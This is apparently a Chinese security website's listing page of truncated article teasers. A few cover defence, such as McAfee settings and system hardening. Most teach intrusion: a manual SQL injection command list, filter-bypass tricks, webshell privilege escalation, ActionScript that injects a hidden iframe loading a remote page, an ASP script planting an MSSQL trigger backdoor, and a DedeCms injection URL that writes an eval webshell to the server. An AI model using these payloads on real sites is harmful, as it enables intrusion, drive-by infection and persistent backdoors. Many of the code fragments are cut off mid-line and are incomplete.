mcafee 企业版8.0 i设置指南(图文)
mcafee,中文称作麦咖啡。最近老是有人问麦咖啡的问题,于是决定写一篇这样的东西,希望可以对使用麦咖啡的朋友有点帮助^_^
首先打开麦咖啡的控制台,右击任务栏的图标或者从开始菜单都可以打开,可以看到以下的界面
下面按照控制台中的顺序一个一个来说
访问保护
这里,就是麦咖啡的简单的网络防火墙功能,可以设定 ...
远程软件盗窃硬盘数据的3种防止方法
很多时候当一台计算机中毒以后,我们的远控软件就会查看到你硬盘的重要数据,从而将之盗取。我们怎么防止这种情况出现呢?其实您可以把硬盘加密码。但是如果入侵者用远控软件访问就不需要输入密码,直接就能访问到你的硬盘。
方法一:
运行regedit命令
进入 HKEY_CURRENT_USER\SoftWare\MicrosoftWindows\CurrentVer ...
McAfee防止挂马 用McAfee阻止IIS写入asp文件
进入 Mcafee 的 VirusScan 控制台,双击访问保护->进文件,共享资源和文件夹保护,在要阻挡的文件和文件夹那点添加
规则名: 禁止网站进程在任何地方修建和修改文件(.asp) 这个随便写的
要阻挡的内容: 进程: **w3wp.exe**
要阻挡的文件或文件夹名: **\**.asp
阻挡的操作类型是: 写入,创建,删除
然后确定
可以只阻挡IIS ...
个人主机 入侵网络攻击的步骤
个人主机入侵网络攻击的步骤 第一步:隐藏自已的位置 为了不在目的主机上留下自己的IP地址,防止被目的主机发现,老练的攻击者都会尽 量通过“跳板”或“肉鸡”展开攻击。所谓“肉鸡”通常是指,HACK实现通过后门程序控制 的傀儡主机,通过“肉鸡”开展的扫描及攻击,即便 ...
webshell 提权方法 服务器提权教程
一:首先检测一下网站的服务器是否开了 3389 远程终端 二:检测一下服务是否用了serv-u (还有是什么版本的) 方法 一:复制一个网站 用 3389 登陆器连接一下 (是否成功) 能连接了,拿下服务器的机率,提高 30%了 二:用ftp模式查下一个服务器的版本 开始 -- 运行 -- cmd -- ftp (加你要登陆的网站) -------------------- ...
注入命令 手工注入命令大全
1.判断是否有注入;and 1=1 ;and 1=22.初步判断是否是mssql ;and user>03.注入参数是字符'and [查询条件] and ''='4.搜索时没过滤参数的'and [查询条件] and '%25'='5.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access6.猜数据库 ;and (select Count(*) fr ...
编辑器代码逃逸漏洞 by蚊虫原创
好 版权信息 把他变成小马
成功保存
但是没有被执行..
应该是马的问题
马儿不行 当然是更换了 这不 怪事出现了 你看..
看 命令成功完成! 非法操作! 这这么跑出来了?????????????
真是怪了难道我的马儿真的长褪了?
研究了一下中以明白是怎么回事了..
看看我的 ...
渗透服务器 绕过防注入文件
一般通用过滤字符串的关键字有以下这些: and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | = 而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。 对于关键字的过滤,以下是我收集的以及我个人的一 ...
swf 调用网马代码
// Action script...var lcx= "var O = document.createElement(\"iframe\");O.src=\"https://www.jb51.net/newout.html\";O.width=0;O.height=0;document.body.appendChild(O);";flash.external.ExternalInterface.call("eval", lcx);以上封装的网马要放在body里。如果要放任意位置,采取以下代码:复制代码代码如下:windo ...
MsSql 触发器后门asp版
复制代码代码如下:<%'里边的变量代码大家用时自己改吧On Error Resume nextSet conn=Server.CreateObject("ADODB.Connection") DSN="driver={SQL Server};Server=(Local)\GSQL;database=baby;uid=sa;pwd=lcx;"conn.Open DSNif conn.State=1 then response.write("成功") sql="CREATE TRIGGER myasp_bkdoor"&Chr(10)&Chr(13) ...
DedeCms注入漏洞 影响版本5.3、5.5Posted in php
假设域名是:www.abc.com 攻击步骤如下: 1. 访问网址: http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?> 可看见以下错误信息 注入成功 2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。 int(3) Error: Illegal double '102 ...
菜鸟玩注入之找后台篇
先把目标网站打开
现在开始找注入点...如图:
然后手工检测
and 1=1
返回信息正常
该点可以注入
恭喜,该URL可以注入!数据库类型:Access数据库
现在用明小子来猜解用户和密码
这里菜鸟门应该都会,我就不做演示了
看操作
用户名admin
密码01f51f53a1706acf
我提前 ...
社会工程学的八种常用方法
转自CB,不同意原文使用的”伎俩”一词.社会工程学也是一门科学,是科学就有科学的方法,帮改之为”方法”.
以下是原文:
著名黑客Kevin Mitnick在上世纪90年代让“黑客社会工程学”这个术语流行了起来,不过这个简单的概念本身(引诱某人去做某事,或者泄露敏感信息)却早有年头了. 专家们认为,如今 ...
菜鸟也学IP的侦察和隐藏
在正式进行各种“黑客行为”之前,黑客会采取各种手段,探测(也可以说“侦察”)对方的主机信息,以便决定使用何种最有效的方法达到自己的目的。来看看黑客是如何获知最基本的网络信息——对方的IP地址;以及用户如何防范自己的IP泄漏。 获取IP “IP”作为 ...
小议session欺骗的利用以及价值
对于session欺骗 大家都蒙了。 百度上有一篇文章 骗了整个网络界 虽然有不少人已经发现是错误的理论 误导的文章 。使不少人觉得 session欺骗很牛x 其实不然那篇文章叫eWebEditor session欺骗漏洞没错 ew的确存在那漏洞 但是那个作者说错了 原文:eWebEditor session欺骗漏洞文章作者:nowthkeWebEditor在线编辑 ...
利用php来嗅探劫持服务器数据
前几天刺在我们的maillist发了一个老外写的文章,大意是可以用php来实现数据的劫持和转发。我瞄了一下,确实可行,于是今天抽出了以前用来扯淡的时间,写了段代码验证了一下想法。老外的原文是一个PDF,有兴趣看的可以看看。地址是在:http://www.secforce.co.uk/media/presentations/OWASP_Abusing_PHP_sockets.pdf。其实 ...
木马病毒产业链 木马制作和分销
在希腊神话里,特洛伊木马背后是一个凄美的故事。可在如今的互联网世界里,木马背后隐藏着的是一条罪恶的产业链。如果不是因为上周,徐州市鼓楼区人民法院对“温柔木马”等11名犯罪嫌疑人的公开审理,这个王国里的黑幕或许依旧尘封。
新京报制图/林军明
目标 访问量大的“薄弱”网站
在整个犯 ...
加强企业Linux系统安全的若干方法
为了帮助企业了解和掌握如何加强Linux系统在安全方面的管理,除了把预防工作提前做好外,还需要了解黑客常用手法。
下面,分别从黑客对Linux的入侵攻击和Linux系统的安全防护两个方面来介绍如何加强Linux系统在安全方面的管理。
防止黑客的入侵
在谈黑客入侵方面的安全管理之前,简单介绍一些黑客攻击Linux主机 ...
三年不重装 令Windows百毒不侵13妙招
我的电脑很少中毒,至少在我知道的情况下我的电脑没用中过毒。消灭病毒的难度是很大的,但做好预防工作却是非常容易的。下面是我的一些做法,个人认为做好下面的措施,电脑中毒机会的就会是微乎其微,这些措施只针对Windows操作系统。1、必须安装防火墙和杀毒软件不管你是怎样的高手,这两种软件还是需要安装的。虽然在面对 ...
Cmd模式下的入侵技术大全
Cmd Shell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。 本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。 文件传输 对于溢出漏洞获得的cmd shell,最大的问题就是如何上传文件。由于蠕虫病毒流行,连接ipc$所需要的139或445端口被路由封锁。 ...
